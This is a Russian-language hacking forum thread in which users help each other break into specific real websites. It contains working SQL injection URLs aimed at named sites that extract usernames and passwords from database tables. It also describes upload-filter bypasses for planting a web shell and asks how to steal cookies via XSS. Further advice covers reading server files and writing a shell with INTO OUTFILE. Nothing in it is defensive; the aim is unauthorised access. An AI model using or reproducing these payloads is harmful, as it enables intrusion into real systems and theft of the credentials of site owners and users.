http://uralpress.ru/admin как только перехожу по ссылке сразу редиректит на главнуююю...как попасть в админку?)
А с чего ты взял что это и есть админка, она может быть по другому пути и точто в роботс написано что /admin/ это еще не значит что но там и есть
Вообще вот она - http://uralpress.ru/admin/phpmyadmin/index.php Но как я понял там прав не хватает чтоле)
есть возможность провести XSS, но есть одна проблема, фильтруется + (из-за magic_quotes), как провести кражу куков если фильтруется + ? (точнее не фильтруется, а заменяется на пробел) пробывал подставлять %2B
Попробуй через загрузку картинок. Я заливал так: 123.gif.php Там идет фильтрация кривая, не поможет, попробуй поменять. Например: 123.php.gifs Или если ооочень повезет, заливай .htaccess с содержимым: , а затем сам шел переименовый в 123.gif
Залей просто картинку, посмотри отправляемые пакеты. Смотрим что-то вроде Content-type: image/gif . Потом залей файл shell.gif.php (сам шелл или нужный файл), перехвати пакеты через Temper Data. Найди строку с Content-type: text или как-то так будет и замени на Content-type: image/gif
есть скуль на mssql. просмотрел таблицы, нашёл "admin". в ней столбцы типа id, name... делаю запрос Code: http://site.com/site.asp?ID=-1+UNION+ALL+SELECT+1,id+from+admin-- получаю ошибку [ODBC SQL Server Driver][SQL Server]Invalid object name 'admin'. в чём дело? таблица точно существует.
может быть другая база, Смотри имя базы а потом select tra,la,la+from+schema.table хотя на mssql не проверил
вот скуль, которая нормально выводит таблици но когда заглядываеш в сами таблици ничего не выводит при таком запросе ничего не выводит, в чем может быть проблема?
На этом сайте не 1 бд. Когда их более 1 нужно указывать откуды выводишь данные. Вот будет правильно: Code: http://www.grovearcade.com/index.php?page=-6+union+select+1,2,3,concat_ws(0x3a,user,password)%20,5,6,7,8,9,0,11,12+from+mysql.user--
http://www.grovearcade.com/index.php?page=-6+UNION+SELECT+1,2,3,(SELECT+CONCAT_WS(0x3a,UserName,Password)+FROM+grovearcade.accounts+LIMIT+0,1),5,6,7,8,9,10,11,12-- и заметь что там юзверь под которым крутится БД , root ...читаются файлы на серванте(Load_file ), попробуй еще INTO+OUTFILE может шелл зальешь если путь абсолютный узнаешь путь /var/www/html также есть phpmyadmin но с бейсик авторизацией, но так как файлы читаются..остается прочитать нужный файл.... http://www.grovearcade.com/manager думаю что шелл практически у тебя в руках..ну и раз выложил сюда скулю..то скоро там шеллов как граблей на огороде будет
